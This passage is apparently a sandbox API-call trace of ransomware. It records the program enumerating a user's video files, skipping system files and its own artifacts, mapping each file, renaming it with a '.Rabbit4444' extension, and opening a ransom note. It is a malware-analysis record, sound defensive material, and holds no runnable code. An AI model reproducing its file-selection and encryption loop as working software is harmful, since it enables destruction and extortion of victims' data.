(lpString1="..", lpString2="..") returned 0 [0048.450] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe6329ba6, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe6329ba6, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe6329ba6, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0048.450] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.450] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0048.450] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x594e1300, ftCreationTime.dwHighDateTime=0x1d4cb53, ftLastAccessTime.dwLowDateTime=0x15023bd0, ftLastAccessTime.dwHighDateTime=0x1d4d086, ftLastWriteTime.dwLowDateTime=0x15023bd0, ftLastWriteTime.dwHighDateTime=0x1d4d086, nFileSizeHigh=0x0, nFileSizeLow=0xcd07, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2YT7 9HWKP 1.swf", cAlternateFileName="2YT79H~1.SWF")) returned 1 [0048.450] lstrcmpiW (lpString1="2YT7 9HWKP 1.swf", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.450] lstrcmpiW (lpString1="2YT7 9HWKP 1.swf", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.450] lstrcmpiW (lpString1="2YT7 9HWKP 1.swf", lpString2="Rabbit4444.exe") returned -1 [0048.450] lstrcmpiW (lpString1="2YT7 9HWKP 1.swf", lpString2=".") returned 1 [0048.450] lstrcmpiW (lpString1="2YT7 9HWKP 1.swf", lpString2="..") returned 1 [0048.450] lstrcmpiW (lpString1="2YT7 9HWKP 1.swf", lpString2="windows") returned -1 [0048.450] lstrcmpiW (lpString1="2YT7 9HWKP 1.swf", lpString2="bootmgr") returned -1 [0048.450] lstrcmpiW (lpString1="2YT7 9HWKP 1.swf", lpString2="pagefile.sys") returned -1 [0048.451] lstrcmpiW (lpString1="2YT7 9HWKP 1.swf", lpString2="boot") returned -1 [0048.451] lstrcmpiW (lpString1="2YT7 9HWKP 1.swf", lpString2="ids.txt") returned -1 [0048.451] lstrcmpiW (lpString1="2YT7 9HWKP 1.swf", lpString2="NTUSER.DAT") returned -1 [0048.451] lstrcpyW (in: lpString1=0x130eb72, lpString2="2YT7 9HWKP 1.swf" | out: lpString1="2YT7 9HWKP 1.swf") returned="2YT7 9HWKP 1.swf" [0048.451] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\IGecK\\2YT7 9HWKP 1.swf", dwFileAttributes=0x0) returned 1 [0048.451] lstrlenW (lpString="2YT7 9HWKP 1.swf") returned 16 [0048.451] lstrlenW (lpString="Rabbit4444") returned 10 [0048.451] lstrcmpiW (lpString1="HWKP 1.swf", lpString2="Rabbit4444") returned -1 [0048.451] lstrlenW (lpString=".dll") returned 4 [0048.451] lstrcmpiW (lpString1=".swf", lpString2=".dll") returned 1 [0048.451] lstrlenW (lpString=".lnk") returned 4 [0048.451] lstrcmpiW (lpString1=".swf", lpString2=".lnk") returned 1 [0048.451] lstrlenW (lpString=".ini") returned 4 [0048.451] lstrcmpiW (lpString1=".swf", lpString2=".ini") returned 1 [0048.451] lstrlenW (lpString=".sys") returned 4 [0048.451] lstrcmpiW (lpString1=".swf", lpString2=".sys") returned -1 [0048.451] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\IGecK\\2YT7 9HWKP 1.swf" (normalized: "c:\\users\\fd1hvy\\videos\\igeck\\2yt7 9hwkp 1.swf"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.451] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0048.451] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13976225846) returned 1 [0048.452] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=52487) returned 1 [0048.452] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0048.452] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d98 [0048.452] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xd010, lpName=0x0) returned 0x298 [0048.452] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd010) returned 0x70000 [0048.454] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0048.454] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0048.454] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0048.454] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0048.454] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0048.454] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0048.454] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0048.454] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0048.454] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13976477380) returned 1 [0048.454] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0048.454] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d98 | out: hHeap=0xe0000) returned 1 [0048.454] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.455] CloseHandle (hObject=0x298) returned 1 [0048.455] CloseHandle (hObject=0x278) returned 1 [0048.457] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Videos\\IGecK\\2YT7 9HWKP 1.swf.Rabbit4444") returned 56 [0048.457] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\IGecK\\2YT7 9HWKP 1.swf" (normalized: "c:\\users\\fd1hvy\\videos\\igeck\\2yt7 9hwkp 1.swf"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\IGecK\\2YT7 9HWKP 1.swf.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\videos\\igeck\\2yt7 9hwkp 1.swf.rabbit4444"), dwFlags=0x1) returned 1 [0048.457] InterlockedExchangeAdd (in: Addend=0xff618, Value=52496 | out: Addend=0xff618) returned 16500736 [0048.457] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3347 [0048.457] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdb1ee40, ftCreationTime.dwHighDateTime=0x1d4c5ee, ftLastAccessTime.dwLowDateTime=0xa0ffae50, ftLastAccessTime.dwHighDateTime=0x1d4d3b1, ftLastWriteTime.dwLowDateTime=0xa0ffae50, ftLastWriteTime.dwHighDateTime=0x1d4d3b1, nFileSizeHigh=0x0, nFileSizeLow=0x14cd5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Dl_2E.mp4", cAlternateFileName="")) returned 1 [0048.457] lstrcmpiW (lpString1="Dl_2E.mp4", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.457] lstrcmpiW (lpString1="Dl_2E.mp4", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.457] lstrcmpiW (lpString1="Dl_2E.mp4", lpString2="Rabbit4444.exe") returned -1 [0048.457] lstrcmpiW (lpString1="Dl_2E.mp4", lpString2=".") returned 1 [0048.458] lstrcmpiW (lpString1="Dl_2E.mp4", lpString2="..") returned 1 [0048.458] lstrcmpiW (lpString1="Dl_2E.mp4", lpString2="windows") returned -1 [0048.458] lstrcmpiW (lpString1="Dl_2E.mp4", lpString2="bootmgr") returned 1 [0048.458] lstrcmpiW (lpString1="Dl_2E.mp4", lpString2="pagefile.sys") returned -1 [0048.458] lstrcmpiW (lpString1="Dl_2E.mp4", lpString2="boot") returned 1 [0048.458] lstrcmpiW (lpString1="Dl_2E.mp4", lpString2="ids.txt") returned -1 [0048.458] lstrcmpiW (lpString1="Dl_2E.mp4", lpString2="NTUSER.DAT") returned -1 [0048.458] lstrcpyW (in: lpString1=0x130eb72, lpString2="Dl_2E.mp4" | out: lpString1="Dl_2E.mp4") returned="Dl_2E.mp4" [0048.458] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\IGecK\\Dl_2E.mp4", dwFileAttributes=0x0) returned 1 [0048.458] lstrlenW (lpString="Dl_2E.mp4") returned 9 [0048.458] lstrlenW (lpString="Rabbit4444") returned 10 [0048.458] lstrcmpiW (lpString1="", lpString2="Rabbit4444") returned -1 [0048.458] lstrlenW (lpString=".dll") returned 4 [0048.458] lstrcmpiW (lpString1=".mp4", lpString2=".dll") returned 1 [0048.458] lstrlenW (lpString=".lnk") returned 4 [0048.458] lstrcmpiW (lpString1=".mp4", lpString2=".lnk") returned 1 [0048.458] lstrlenW (lpString=".ini") returned 4 [0048.458] lstrcmpiW (lpString1=".mp4", lpString2=".ini") returned 1 [0048.458] lstrlenW (lpString=".sys") returned 4 [0048.458] lstrcmpiW (lpString1=".mp4", lpString2=".sys") returned -1 [0048.458] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\IGecK\\Dl_2E.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\igeck\\dl_2e.mp4"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.458] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0048.458] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13976920512) returned 1 [0048.458] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=85205) returned 1 [0048.459] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0048.459] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101408 [0048.459] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x14fe0, lpName=0x0) returned 0x298 [0048.459] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x14fe0) returned 0x70000 [0048.461] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0048.461] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0048.461] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0048.461] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0048.461] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0048.461] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0048.461] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0048.461] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0048.461] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13977193971) returned 1 [0048.461] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0048.461] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101408 | out: hHeap=0xe0000) returned 1 [0048.461] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.462] CloseHandle (hObject=0x298) returned 1 [0048.462] CloseHandle (hObject=0x278) returned 1 [0048.465] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Videos\\IGecK\\Dl_2E.mp4.Rabbit4444") returned 49 [0048.465] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\IGecK\\Dl_2E.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\igeck\\dl_2e.mp4"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\IGecK\\Dl_2E.mp4.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\videos\\igeck\\dl_2e.mp4.rabbit4444"), dwFlags=0x1) returned 1 [0048.465] InterlockedExchangeAdd (in: Addend=0xff618, Value=85216 | out: Addend=0xff618) returned 16553232 [0048.465] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3349 [0048.465] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x45366f0, ftCreationTime.dwHighDateTime=0x1d4ce2a, ftLastAccessTime.dwLowDateTime=0x65ac75c0, ftLastAccessTime.dwHighDateTime=0x1d4c5e9, ftLastWriteTime.dwLowDateTime=0x65ac75c0, ftLastWriteTime.dwHighDateTime=0x1d4c5e9, nFileSizeHigh=0x0, nFileSizeLow=0x12572, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tPmIDjSq0JZ6KPmq.mp4", cAlternateFileName="TPMIDJ~1.MP4")) returned 1 [0048.465] lstrcmpiW (lpString1="tPmIDjSq0JZ6KPmq.mp4", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0048.465] lstrcmpiW (lpString1="tPmIDjSq0JZ6KPmq.mp4", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.465] lstrcmpiW (lpString1="tPmIDjSq0JZ6KPmq.mp4", lpString2="Rabbit4444.exe") returned 1 [0048.465] lstrcmpiW (lpString1="tPmIDjSq0JZ6KPmq.mp4", lpString2=".") returned 1 [0048.465] lstrcmpiW (lpString1="tPmIDjSq0JZ6KPmq.mp4", lpString2="..") returned 1 [0048.465] lstrcmpiW (lpString1="tPmIDjSq0JZ6KPmq.mp4", lpString2="windows") returned -1 [0048.465] lstrcmpiW (lpString1="tPmIDjSq0JZ6KPmq.mp4", lpString2="bootmgr") returned 1 [0048.465] lstrcmpiW (lpString1="tPmIDjSq0JZ6KPmq.mp4", lpString2="pagefile.sys") returned 1 [0048.466] lstrcmpiW (lpString1="tPmIDjSq0JZ6KPmq.mp4", lpString2="boot") returned 1 [0048.466] lstrcmpiW (lpString1="tPmIDjSq0JZ6KPmq.mp4", lpString2="ids.txt") returned 1 [0048.466] lstrcmpiW (lpString1="tPmIDjSq0JZ6KPmq.mp4", lpString2="NTUSER.DAT") returned 1 [0048.466] lstrcpyW (in: lpString1=0x130eb72, lpString2="tPmIDjSq0JZ6KPmq.mp4" | out: lpString1="tPmIDjSq0JZ6KPmq.mp4") returned="tPmIDjSq0JZ6KPmq.mp4" [0048.466] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\IGecK\\tPmIDjSq0JZ6KPmq.mp4", dwFileAttributes=0x0) returned 1 [0048.466] lstrlenW (lpString="tPmIDjSq0JZ6KPmq.mp4") returned 20 [0048.466] lstrlenW (lpString="Rabbit4444") returned 10 [0048.466] lstrcmpiW (lpString1="Z6KPmq.mp4", lpString2="Rabbit4444") returned 1 [0048.466] lstrlenW (lpString=".dll") returned 4 [0048.466] lstrcmpiW (lpString1=".mp4", lpString2=".dll") returned 1 [0048.466] lstrlenW (lpString=".lnk") returned 4 [0048.466] lstrcmpiW (lpString1=".mp4", lpString2=".lnk") returned 1 [0048.466] lstrlenW (lpString=".ini") returned 4 [0048.466] lstrcmpiW (lpString1=".mp4", lpString2=".ini") returned 1 [0048.466] lstrlenW (lpString=".sys") returned 4 [0048.466] lstrcmpiW (lpString1=".mp4", lpString2=".sys") returned -1 [0048.466] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\IGecK\\tPmIDjSq0JZ6KPmq.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\igeck\\tpmidjsq0jz6kpmq.mp4"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.466] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0048.466] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13977704784) returned 1 [0048.466] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=75122) returned 1 [0048.466] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117d10 [0048.466] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101ea8 [0048.466] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x12880, lpName=0x0) returned 0x298 [0048.467] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12880) returned 0x70000 [0048.469] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0048.469] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0048.469] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0048.469] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0048.469] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0048.469] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0048.469] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0048.469] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0048.469] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13977979013) returned 1 [0048.469] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117d10 | out: hHeap=0xe0000) returned 1 [0048.469] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101ea8 | out: hHeap=0xe0000) returned 1 [0048.469] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.470] CloseHandle (hObject=0x298) returned 1 [0048.470] CloseHandle (hObject=0x278) returned 1 [0048.472] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Videos\\IGecK\\tPmIDjSq0JZ6KPmq.mp4.Rabbit4444") returned 60 [0048.472] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\IGecK\\tPmIDjSq0JZ6KPmq.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\igeck\\tpmidjsq0jz6kpmq.mp4"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\IGecK\\tPmIDjSq0JZ6KPmq.mp4.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\videos\\igeck\\tpmidjsq0jz6kpmq.mp4.rabbit4444"), dwFlags=0x1) returned 1 [0048.473] InterlockedExchangeAdd (in: Addend=0xff618, Value=75136 | out: Addend=0xff618) returned 16638448 [0048.473] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3351 [0048.473] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e1946e0, ftCreationTime.dwHighDateTime=0x1d4cc9d, ftLastAccessTime.dwLowDateTime=0xa0f1e200, ftLastAccessTime.dwHighDateTime=0x1d4d098, ftLastWriteTime.dwLowDateTime=0xa0f1e200, ftLastWriteTime.dwHighDateTime=0x1d4d098, nFileSizeHigh=0x0, nFileSizeLow=0xa85f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WwiHK0yV6.flv", cAlternateFileName="WWIHK0~1.FLV")) returned 1 [0048.473] lstrcmpiW (lpString1="WwiHK0yV6.flv", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0048.473] lstrcmpiW (lpString1="WwiHK0yV6.flv", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.473] lstrcmpiW (lpString1="WwiHK0yV6.flv", lpString2="Rabbit4444.exe") returned 1 [0048.473] lstrcmpiW (lpString1="WwiHK0yV6.flv", lpString2=".") returned 1 [0048.473] lstrcmpiW (lpString1="WwiHK0yV6.flv", lpString2="..") returned 1 [0048.473] lstrcmpiW (lpString1="WwiHK0yV6.flv", lpString2="windows") returned 1 [0048.473] lstrcmpiW (lpString1="WwiHK0yV6.flv", lpString2="bootmgr") returned 1 [0048.473] lstrcmpiW (lpString1="WwiHK0yV6.flv", lpString2="pagefile.sys") returned 1 [0048.473] lstrcmpiW (lpString1="WwiHK0yV6.flv", lpString2="boot") returned 1 [0048.473] lstrcmpiW (lpString1="WwiHK0yV6.flv", lpString2="ids.txt") returned 1 [0048.473] lstrcmpiW (lpString1="WwiHK0yV6.flv", lpString2="NTUSER.DAT") returned 1 [0048.473] lstrcpyW (in: lpString1=0x130eb72, lpString2="WwiHK0yV6.flv" | out: lpString1="WwiHK0yV6.flv") returned="WwiHK0yV6.flv" [0048.473] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\IGecK\\WwiHK0yV6.flv", dwFileAttributes=0x0) returned 1 [0048.473] lstrlenW (lpString="WwiHK0yV6.flv") returned 13 [0048.473] lstrlenW (lpString="Rabbit4444") returned 10 [0048.474] lstrcmpiW (lpString1="HK0yV6.flv", lpString2="Rabbit4444") returned -1 [0048.474] lstrlenW (lpString=".dll") returned 4 [0048.474] lstrcmpiW (lpString1=".flv", lpString2=".dll") returned 1 [0048.474] lstrlenW (lpString=".lnk") returned 4 [0048.474] lstrcmpiW (lpString1=".flv", lpString2=".lnk") returned -1 [0048.474] lstrlenW (lpString=".ini") returned 4 [0048.474] lstrcmpiW (lpString1=".flv", lpString2=".ini") returned -1 [0048.474] lstrlenW (lpString=".sys") returned 4 [0048.474] lstrcmpiW (lpString1=".flv", lpString2=".sys") returned -1 [0048.474] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\IGecK\\WwiHK0yV6.flv" (normalized: "c:\\users\\fd1hvy\\videos\\igeck\\wwihk0yv6.flv"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.474] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0048.474] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13978467134) returned 1 [0048.474] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=43103) returned 1 [0048.474] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ab8 [0048.474] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101518 [0048.474] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xab60, lpName=0x0) returned 0x298 [0048.474] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xab60) returned 0x70000 [0048.475] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0048.475] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0048.475] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0048.475] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0048.476] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0048.476] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0048.476] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0048.476] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0048.476] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13978661596) returned 1 [0048.476] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ab8 | out: hHeap=0xe0000) returned 1 [0048.476] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101518 | out: hHeap=0xe0000) returned 1 [0048.476] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.476] CloseHandle (hObject=0x298) returned 1 [0048.476] CloseHandle (hObject=0x278) returned 1 [0048.478] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Videos\\IGecK\\WwiHK0yV6.flv.Rabbit4444") returned 53 [0048.478] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\IGecK\\WwiHK0yV6.flv" (normalized: "c:\\users\\fd1hvy\\videos\\igeck\\wwihk0yv6.flv"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\IGecK\\WwiHK0yV6.flv.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\videos\\igeck\\wwihk0yv6.flv.rabbit4444"), dwFlags=0x1) returned 1 [0048.479] InterlockedExchangeAdd (in: Addend=0xff618, Value=43104 | out: Addend=0xff618) returned 16713584 [0048.479] InterlockedExchangeAdd (in: Addend=0xff624, Value=1 | out: Addend=0xff624) returned 3353 [0048.479] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e1946e0, ftCreationTime.dwHighDateTime=0x1d4cc9d, ftLastAccessTime.dwLowDateTime=0xa0f1e200, ftLastAccessTime.dwHighDateTime=0x1d4d098, ftLastWriteTime.dwLowDateTime=0xa0f1e200, ftLastWriteTime.dwHighDateTime=0x1d4d098, nFileSizeHigh=0x0, nFileSizeLow=0xa85f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WwiHK0yV6.flv", cAlternateFileName="WWIHK0~1.FLV")) returned 0 [0048.479] FindClose (in: hFindFile=0x102a90 | out: hFindFile=0x102a90) returned 1 [0048.479] lstrcpyW (in: lpString1=0x130eb72, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0048.479] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\IGecK\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\videos\\igeck\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0048.480] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0048.480] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0048.481] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.481] 